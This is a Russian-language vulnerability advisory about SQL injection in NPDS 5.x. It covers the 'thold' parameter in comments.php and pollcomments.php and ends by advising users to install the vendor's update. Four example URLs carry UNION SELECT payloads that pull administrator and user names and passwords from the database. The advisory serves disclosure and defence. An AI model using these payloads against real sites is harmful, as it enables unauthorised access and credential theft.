SQL-инъекция в NPDS

Дата публикации:
17.05.2005
Дата изменения:
12.01.2009
Всего просмотров:
952
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
NPDS 5.x
Уязвимые версии: NPDS 5.x

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость обнаружена в сценариях 'comments.php' и 'pollcomments.php' из-за недостаточной фильтрации данных в параметре 'thold', и в некоторых других сценариях (например, в параметре "categories" в сценарии "faq.php"). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Примеры:

http://[target]/npds/comments.php?thold=0%
20UNION%20SELECT%200,0,0,0,0,0,0,0,
aid,pwd,0,0%20FROM%20authors

http://[target]/npds/comments.php?thold =0%
20UNION%20SELECT%200,0,0,0,0,0,0,0,
uname,pass,0,0%20FROM%20users

http://[target]/npds/pollcomments.php?thold=
0%20UNION%20SELECT%200,0,0,0,0,0
,0,0,aid,pwd,0,0%20FROM %20authors

http://[target]/npds/pollcomments.php?op=results
& pollID=2&mode=&order=&thold=0%20UNI
ON%20SELECT%200,0,0,0,0,0,0,0,uname,pass
,0,0%20FROM%20u

URL производителей: http://www.npds.org

Решение: Установите обновление с сайта производителя.

Журнал изменений:

12.01.2009
Изменено описание уязвимости.

Ссылки: Inject SQL command in pollcomments.php & comments.php

или введите имя

CAPTCHA